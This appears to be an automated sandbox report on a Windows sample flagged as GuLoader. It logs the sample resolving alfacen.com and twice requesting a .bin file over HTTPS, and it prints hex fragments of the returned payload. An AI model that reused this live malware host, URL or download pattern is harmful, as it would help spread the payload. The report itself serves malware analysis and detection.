                                                Oct 20, 2024 17:58:26.926230907 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.927086115 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.927155018 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.985213995 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.985349894 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.057085991 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.057187080 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.058031082 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.058104992 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.059659004 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.059729099 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.060605049 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.060669899 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.062629938 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.062700987 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.063502073 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.063568115 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.065359116 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.065433025 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.066169977 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.066231966 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.075084925 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.075145960 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.075165033 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.075210094 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.080794096 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.080809116 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:37.123550892 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:37.123584986 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:37.123666048 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:37.124300003 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:37.124320030 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.220144033 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.220271111 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.220947027 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.220956087 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.221189976 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.221195936 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552139044 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552197933 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552227020 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.552247047 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552265882 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.552309036 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.716852903 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.716985941 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.724363089 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.724455118 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.725524902 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.725608110 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.889137030 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.889282942 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.890130043 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.890221119 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.896019936 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.896115065 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.896852016 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.896943092 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.897838116 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.897917986 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.898745060 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.898822069 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.013526917 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.013612986 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.036331892 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.036408901 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.061754942 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.061842918 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.062711954 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.062968969 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.064307928 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.064376116 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.068392992 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.068481922 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.069433928 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.069502115 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.070445061 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.070523024 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.071201086 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.071271896 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.072246075 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.072312117 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.073191881 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.073271036 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.288995028 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.289020061 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.289211035 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.290419102 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.290498972 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.291639090 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.291728973 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.292504072 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.292572975 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.294097900 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.294173002 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.295732021 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.295802116 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.296447039 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.296521902 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.297403097 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.297475100 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.298399925 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.298471928 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.299365044 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.299438953 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.300329924 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.300400972 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.301304102 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.301376104 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.405173063 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.405297041 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.406152010 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.406230927 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407046080 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407120943 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407157898 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407216072 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407223940 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407268047 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407326937 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407378912 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.420449972 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.420460939 CEST44349982193.107.36.30192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 17:58:24.579626083 CEST | 61590 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 17:58:24.673593044 CEST | 53 | 61590 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 20, 2024 17:58:24.579626083 CEST | 192.168.2.4 | 1.1.1.1 | 0xd36b | Standard query (0) | alfacen.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 20, 2024 17:58:24.673593044 CEST | 1.1.1.1 | 192.168.2.4 | 0xd36b | No error (0) | alfacen.com | (none) | 193.107.36.30 | A (IP address) | IN (0x0001) | false
                                                • alfacen.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49929 | 193.107.36.30 | 443 | 8124 | C:\Users\user\Desktop\3507071243740008011.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 15:58:25 UTC | 174 | OUT | GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: alfacen.com
Cache-Control: no-cache
2024-10-20 15:58:26 UTC | 344 | IN | HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 15:58:26 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Fri, 18 Oct 2024 13:09:53 GMT
Accept-Ranges: bytes
Content-Length: 289344
Cache-Control: max-age=2592000
Expires: Tue, 19 Nov 2024 15:58:26 GMT
Vary: Accept-Encoding
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49982 | 193.107.36.30 | 443 | 8124 | C:\Users\user\Desktop\3507071243740008011.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 15:58:38 UTC | 174 | OUT | GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: alfacen.com
Cache-Control: no-cache
2024-10-20 15:58:38 UTC | 344 | IN | HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 15:58:38 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Fri, 18 Oct 2024 13:09:53 GMT
Accept-Ranges: bytes
Content-Length: 289344
Cache-Control: max-age=2592000
Expires: Tue, 19 Nov 2024 15:58:38 GMT
Vary: Accept-Encoding
Content-Type: application/octet-stream
                                                2024-10-20 15:58:38 UTC7848INData Raw: cd c4 32 61 fb d9 39 26 04 dc 17 79 65 ca 29 f9 97 dd 2a 9a b8 89 1e 30 82 1c ed 54 4b 5b 59 50 43 1b 3e 16 de 3c 83 74 45 d7 49 8f ec 93 7d 4b f9 34 07 20 ec 59 fd ec d2 6a 68 e5 55 1a a8 9e f3 26 b7 d8 f2 e5 47 a6 b0 ef a9 72 9e 2c 15 36 ad b1 22 69 1c 60 5f 47 67 ca c0 68 2b b1 91 2c 64 63 6f 3e 1c 5b 83 a9 4e d8 89 f9 0a 8e c1 1c 94 ca cd 5c 2d 40 ea df cb 0a 1a 11 ae 05 80 bf a4 7b 92 db e1 77 7b 7d 33 4c 89 18 00 6f be 63 16 40 e7 3e 92 aa 31 1e 97 9a 40 64 dd f7 4b d2 7a 7e 16 c7 7e 1b fd d5 bf 2d f0 b6 8f 7c d7 e3 e5 9f 72 f9 1a 2d 97 87 ba cd 8c a0 37 b6 8f a7 c5 53 de f8 c1 c9 1f 16 ed 07 03 be df 8e f4 01 b8 d9 0f 67 da c6 aa 59 02 97 90 eb 6d be 80 65 00 b1 80 20 bd b9 14 16 7d ac da da d9 10 7f b7 79 37 a8 67 27 32 bb 0d d0 8b 05 ae 35 91 e9
                                                Data Ascii: 2a9&ye)*0TK[YPC><tEI}K4 YjhU&Gr,6"i`_Ggh+,dco>[N\-@{w{}3Loc@>1@dKz~~-|r-7SgYme }y7g'25
                                                2024-10-20 15:58:38 UTC8000INData Raw: a6 8f d8 ec 96 d4 b8 54 a0 f4 74 2d 1c cc d0 54 9d 3e 18 25 71 93 e2 95 6d 51 55 39 9f d1 58 41 03 08 63 34 52 e9 00 d5 87 e6 6b 60 ca 61 3d 86 1d f1 99 26 fb 55 f8 79 b7 67 fd 7d a5 5f 56 bf 1b 05 6e 8d 09 91 0b d1 b0 7d 87 f5 f5 a5 f5 d3 fc e3 58 7a fc 5e ce 13 22 9f 7e 3e 4a f8 4d cc 35 bc 5d 07 54 a4 02 18 30 08 1b e2 86 7b fd fe c1 14 91 06 ef 95 63 6a b0 24 b7 c2 d2 13 d4 f1 bb 7a 79 1d 31 a7 ad b9 13 b4 aa 9f 44 9d 5e 0c 9c 39 a3 47 c6 03 ef cf 21 7a 6a 82 60 73 e1 59 89 da 89 0d b2 a8 b1 72 77 d7 64 7c 08 01 73 29 c0 f2 09 d1 11 d9 e5 10 7d 38 ec e5 44 3c 82 7f fc a4 de de 04 ea bd 38 6a e5 f2 f8 bd 24 10 2a 1c 94 b6 58 84 3f f9 60 70 ee 62 42 c0 11 c6 ae 74 30 11 3e 44 ce a0 cf f9 35 9d 05 ac b0 ef ca c3 65 b8 bc 5f 7c 03 45 75 20 bc a6 eb 93 71
                                                Data Ascii: Tt-T>%qmQU9XAc4Rk`a=&Uyg}_Vn}Xz^"~>JM5]T0{cj$zy1D^9G!zj`sYrwd|s)}8D<8j$*X?`pbBt0>D5e_|Eu q
                                                2024-10-20 15:58:38 UTC8000INData Raw: 8a 0f de 8d 04 28 e2 44 15 95 50 b8 cd 9e 33 df 25 e4 23 bf c0 8a 9c 7d 51 0d bd 89 60 e0 fa 87 28 48 a7 c5 a2 5f ea 67 11 c5 df 21 b3 fa 14 01 f2 f7 47 7c 78 af ef b3 ff 31 38 16 45 82 db 1f d6 81 3c 04 dd 2e e4 7c df 5e 07 17 5c 0b bc 6e 55 53 fe df b8 f4 48 3d 49 ca 86 d5 6a 32 86 0f 68 85 00 48 88 6d 09 48 d3 19 e2 93 c1 d4 89 99 25 2e ee 8b 61 f0 2a a4 06 63 7d 13 c3 1a 71 cb 6f 2f 1b 84 4f 4f 5e 8f 78 be e5 d6 af 77 6b d5 41 e6 40 70 73 3a 93 6d 60 ab a1 a1 94 f2 b0 ad a2 42 6b ee e7 c8 18 ea 9f a6 f4 76 84 58 ca cd 48 03 d1 cb b8 83 91 7b 78 d4 2e 61 f6 d5 8e 08 a8 75 78 8e ad 46 7c a1 ba 4e 09 98 d6 44 33 d4 9d 34 56 89 6c f9 6a 03 03 d9 3d 7c a8 72 3d ab 13 64 9a a0 b2 6f 66 1f 52 ab 1b 13 f1 f3 19 2b 72 3c 08 89 c5 ce 8f 3b f7 74 96 88 cc 1e 21
                                                Data Ascii: (DP3%#}Q`(H_g!G|x18E<.|^\nUSH=Ij2hHmH%.a*c}qo/OO^xwkA@ps:m`BkvXH{x.auxF|ND34Vlj=|r=dofR+r<;t!
                                                2024-10-20 15:58:38 UTC8000INData Raw: ab c3 13 e3 29 6e cc ad 14 aa b0 1d 0e b1 7a 68 d1 d9 77 35 0c 2c 44 37 ff 7c e8 95 ab 0f 66 79 80 e8 e1 2e f5 dd 85 6e 5d f6 a8 b7 a4 81 a3 0c 8e 20 3f eb 42 59 58 85 f8 4d 55 9a 6c b6 33 24 05 42 9d 32 d0 22 57 38 70 3b 0f 3b 36 54 9a 6f 14 e8 74 c1 ca a9 e9 80 2c 91 2a ef 23 bd d8 8f 40 f5 46 de b1 cc 37 43 df 75 ec 4e c4 24 0c 2d 94 07 80 44 21 bc f3 48 86 52 d8 fa cf d0 ad 2d 5c 2e 6d 32 b9 98 6b 63 35 40 1a 2b c5 5a d1 91 0c e6 09 ad da f3 b2 0c d8 ab 9f 51 79 57 a7 6d c3 16 12 e8 dc b6 11 3c 3c 79 a4 45 e6 67 27 b5 31 91 da 60 6a 95 31 40 c0 37 65 58 a6 53 92 c3 8b 64 a3 78 4d f2 d8 f0 1e ce 28 c1 5b 9f b8 05 de 30 f6 18 5c 7e e8 90 ae f1 27 85 74 be 7f d2 e9 db 09 0a d6 fa 42 74 11 aa 9a d3 90 04 38 10 5c 12 f2 3a 4a 24 c2 48 4e 81 ed e1 bc 35 9e
                                                Data Ascii: )nzhw5,D7|fy.n] ?BYXMUl3$B2"W8p;;6Tot,*#@F7CuN$-D!HR-\.m2kc5@+ZQyWm<<yEg'1`j1@7eXSdxM([0\~'tBt8\:J$HN5
                                                2024-10-20 15:58:38 UTC8000INData Raw: 47 de ae 68 9d 98 9d e2 7c 07 d0 73 7b 88 9c 14 22 09 bb 87 6f 93 1e 6a 47 26 d4 9c f3 9f 58 5e fc d9 8a df 0e ef 64 60 ad b8 3e bf 08 2b d0 e3 85 07 66 52 4f 82 9f 3a 71 32 29 88 a4 89 12 03 c1 fd 66 25 3c 03 e4 9f 89 9f b4 24 c9 45 2d 21 10 bd 43 20 93 a6 50 01 f8 60 13 0a 65 7a 2d 85 64 86 6c 54 58 e5 54 26 81 03 1d f7 94 94 01 92 85 a6 b8 92 83 05 c0 60 8f 4f 87 67 db 0c d5 37 37 3c 0d 96 c4 87 fe e4 94 91 db 2c dc 78 b7 e7 a3 aa 2a 9f 31 51 9d 41 7f 79 fa 75 10 26 6d dd 6c c4 0a 96 f0 d7 57 89 32 51 fa c6 6a 97 8d 35 66 0d d9 a4 07 a1 fa 24 3d 5f 86 8c bf 2b 17 b3 96 4b 40 1f 2b 01 a3 52 ec bd bb 47 a6 94 3a 8d 27 ee 81 e3 ec 08 a8 19 9d 4f 42 35 bf d5 34 5b 6e 82 c4 7e 18 cc ba b1 b6 99 53 f7 e3 8b 81 01 b5 3b 75 06 85 94 70 f2 a0 d8 7b e7 f8 22 19
                                                Data Ascii: Gh|s{"ojG&X^d`>+fRO:q2)f%<$E-!C P`ez-dlTXT&`Og77<,x*1QAyu&mlW2Qj5f$=_+K@+RG:'OB54[n~S;up{"
                                                2024-10-20 15:58:38 UTC8000INData Raw: 20 14 23 5d ca fa f2 91 a2 ce 49 99 1b 5b 8f 5f 02 de 55 3f 8c 21 c7 cb fd d2 6f c3 54 40 4a 84 5c 1c 26 d0 89 25 1f 93 1c 7a 29 7b 41 44 ac 89 09 98 26 26 03 81 70 2e dd 85 e1 bc f6 7d 5b b4 60 c1 b4 6b 4f 1c 92 7c a5 cc 9c 4f 6b c2 56 88 26 83 48 9a de 9f 3f 09 42 f8 81 1b 8b c2 5c 79 13 cb c4 48 8a 2b 3d a2 43 aa 72 90 97 7d e0 80 40 df d7 03 d6 57 eb d8 30 39 99 dd 2e bb c1 93 cb f4 de af e6 b5 7a a5 32 95 e0 d3 df 66 9c 92 35 8d 31 12 7e 59 3b 0b e5 ee 56 b5 7d 95 d3 0d 4e 6c a4 73 d5 48 25 d8 4e 69 08 b5 a3 1b b3 c7 7e 8d 5b 67 29 2b 96 e3 d7 a5 9c 61 e0 2b c7 9e 59 2b e2 bc cf 46 b8 bf 82 2a 5d c6 36 63 87 c6 44 cb 52 cf 7e 5a 60 39 35 66 92 4c 43 19 ba 4c dc 6a c8 d6 a6 5d a3 97 3c 9b 0e 5e 7b 2b 65 5c 25 95 63 40 b6 90 f6 88 9a 6a 44 95 b8 c0 fc
                                                Data Ascii: #]I[_U?!oT@J\&%z){AD&&p.}[`kO|OkV&H?B\yH+=Cr}@W09.z2f51~Y;V}NlsH%Ni~[g)+a+Y+F*]6cDR~Z`95fLCLj]<^{+e\%c@jD
                                                2024-10-20 15:58:38 UTC8000INData Raw: 2f ee b9 66 d5 64 2f ca 63 7d 0b 5d e8 98 1f 27 32 04 64 96 96 54 74 d7 e8 20 7d f4 39 2f 7e 27 1f 03 33 0a d7 19 6e ad ac 04 eb 9a 04 aa 6e 3b 3c e1 06 91 af 74 a7 74 e9 fa 34 12 89 8f b4 80 fa 6c 70 5b 4b db ff c8 57 c3 b1 0e c3 cd cf 07 cb d6 cb 50 cf 91 ea b1 82 0a d4 a8 40 5a 7e 43 bc 24 1d a1 61 05 b8 72 4b 64 aa 0e 55 0c e0 c4 7c d9 fe 69 b8 19 67 64 3d 29 39 e3 3e a1 0a d0 02 97 cb db 60 b1 59 4c d5 0e 4b e6 14 cf 05 88 fa 50 8f 96 b8 f4 f8 ad ed 75 42 6a fe 3d 1d 0c dd b1 54 f3 d3 0d 96 51 02 ef 2c b6 80 02 9a 96 23 df 04 05 2b 60 77 0d ac a5 b8 a9 da 71 bc f7 4f a2 b0 6d 8f 2a 51 ee cb c7 71 bd b8 95 ae 2e d0 cc c3 aa 0b a0 fd 80 db d4 fd a9 23 e6 10 db c5 82 89 29 03 00 ba 3a bf af 03 40 10 09 d7 9e b7 a0 c7 2a e6 c1 6c d0 ab 17 ce 69 0d 0d 76
                                                Data Ascii: /fd/c}]'2dTt }9/~'3nn;<tt4lp[KWP@Z~C$arKdU|igd=)9>`YLKPuBj=TQ,#+`wqOm*Qq.#):@*liv
                                                2024-10-20 15:58:38 UTC8000INData Raw: 47 8a 28 16 da 10 e2 3f c9 ef 6e 1c 85 0c 5b 11 27 72 93 a2 2c 61 24 c5 f0 ea 6d 3d 3b 97 9d 11 99 94 06 39 44 4d b7 6d 87 d8 73 b0 0c f6 7e 1f 4b 8d f6 0a 2a ec ee b0 11 fe 76 ba 83 9a b9 88 d0 a5 1e b8 91 76 a7 51 83 82 b2 d9 59 16 f2 2e 83 b1 d4 10 98 6d ad ee 7a 7c 4e 3e 4b 8c 1a 11 c8 71 ae 44 84 23 94 ab 8f 2f 72 08 28 3b 29 be 9b 81 95 5f 8d e6 00 69 6b fa 9d f9 43 22 cf 6a 10 fb 3a b6 aa dc 83 ff fe a5 64 5c 82 24 f4 01 14 2d a3 f6 82 10 46 0a 0e ea 41 ac 6c 6b 6f 06 d8 50 3c 2d aa ff b6 c6 0e ed 9d 2d 41 36 a6 aa f5 6e 3e 66 0f 16 8b df fd 8c d3 47 1d 49 a1 ce 08 3e 82 39 c4 b7 36 74 a7 ae 75 7c 77 06 79 a0 09 6a 5b ee 8e 56 64 34 2e c9 19 d8 17 fc 4f 39 30 5b ea 7c 72 1b ad 37 93 84 73 09 82 d5 f9 ad 3d 6c 66 7d f6 73 af 47 f7 a7 b7 32 38 2c 7b
                                                Data Ascii: G(?n['r,a$m=;9DMms~K*vvQY.mz|N>KqD#/r(;)_ikC"j:d\$-FAlkoP<--A6n>fGI>96tu|wyj[Vd4.O90[|r7s=lf}sG28,{
                                                2024-10-20 15:58:38 UTC8000INData Raw: ce a5 91 1c 26 fa 3f 5c ad 85 ca 4b 33 f3 5e e5 6e 91 87 da c5 0f 58 2f 14 8a b1 35 44 d9 57 9d a9 98 d4 51 9f 55 19 c0 a4 d0 9b 7a 34 62 43 e2 71 46 85 03 31 cc 38 97 4a 33 62 35 4e 3f ae 47 19 8c be f5 76 4b b9 f6 61 04 2c 32 d7 d3 3e f5 25 2a 33 6e ad f9 7c 6b 4c 86 8f 64 83 24 ad c3 c3 d2 bc 3d 3b 92 9d cf 2c 4c a4 00 b1 d0 6f 89 76 21 d0 b3 8f b1 17 58 45 9f 78 13 52 38 8e 15 bc 4d 39 23 59 6e e5 cd 4a e9 02 1d 4c c7 e6 0c 1b 8e 69 ec b8 b5 2f ea 58 16 78 33 a7 9b 35 a5 4a 4c f7 4f 2b 76 ba 27 7a 6a 2e 34 74 57 d4 30 73 4d 74 cb 72 9b 5c 33 95 3d 22 e2 bc c7 38 d2 a3 df 1c 1e d7 39 5b 5a ff 20 83 bb 76 15 90 07 9f 5c 26 1e ba fb 08 b1 8f 6e 55 c0 a9 a3 87 49 01 2e c2 df 12 8c 56 af fa 06 16 3e b2 ae 51 11 1f f1 fb 1a d5 84 d4 89 61 34 38 53 67 af 4b
                                                Data Ascii: &?\K3^nX/5DWQUz4bCqF18J3b5N?GvKa,2>%*3n|kLd$=;,Lov!XExR8M9#YnJLi/Xx35JLO+v'zj.4tW0sMtr\3="89[Z v\&nUI.V>Qa48SgK
                                                2024-10-20 15:58:38 UTC8000INData Raw: 6c 6c a7 e9 9f 49 1f fe ab ee b1 78 0c 44 f4 17 33 a9 4e 1d 0e 2e 88 fe 7c 7c 15 77 18 6e ed 37 65 6a 3d ab f2 fc da 73 fc 4a 4e 3e f2 da fa e2 b4 6f fb c6 9c 65 8a df 4a a3 a3 4b 32 3d a1 9e 7e 2c 8e 59 94 00 e9 af 9a 61 dd aa 68 3f 3a d8 12 b6 80 f0 23 f2 d5 67 23 f9 a3 20 f2 a7 e8 23 5a 80 c5 19 32 ae aa 23 a4 62 79 9d 2d d8 74 af 0a 9d ed 83 f7 ef cd 7d 22 0c ab 13 e2 e5 54 fa 20 57 96 d8 9f a8 8f 0c da 46 58 20 a9 6c 41 d5 80 27 32 cb 2a dd eb 91 ac 07 07 e9 c9 a4 ea 8b 3d 37 94 7a d7 d6 eb 8a b5 c2 b8 ff 9c 12 80 8c 9f d1 93 fd ba 66 60 e3 13 68 c6 a6 e7 2d a9 62 02 05 8d 78 58 70 30 4f 21 2d a9 f4 76 0d a2 fd 61 9c 61 c7 6e c3 b4 54 ae fe 8e 4d 1d 95 1b b4 75 45 fa b1 dc 35 91 c0 ff 94 c9 41 5f bb 1b e0 4e 8c c0 8f 5e 42 40 13 59 fc 69 5f de 69 02
                                                Data Ascii: llIxD3N.||wn7ej=sJN>oeJK2=~,Yah?:#g# #Z2#by-t}"T WFX lA'2*=7zf`h-bxXp0O!-vaanTMuE5A_N^B@Yi_i



                                                Target ID:0
                                                Start time:11:56:41
                                                Start date:20/10/2024
                                                Path:C:\Users\user\Desktop\3507071243740008011.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                                Imagebase:0x400000
                                                File size:986'863 bytes
                                                MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2641992068.0000000005438000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:11:58:14
                                                Start date:20/10/2024
                                                Path:C:\Users\user\Desktop\3507071243740008011.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                                Imagebase:0x400000
                                                File size:986'863 bytes
                                                MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:22.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:19.5%
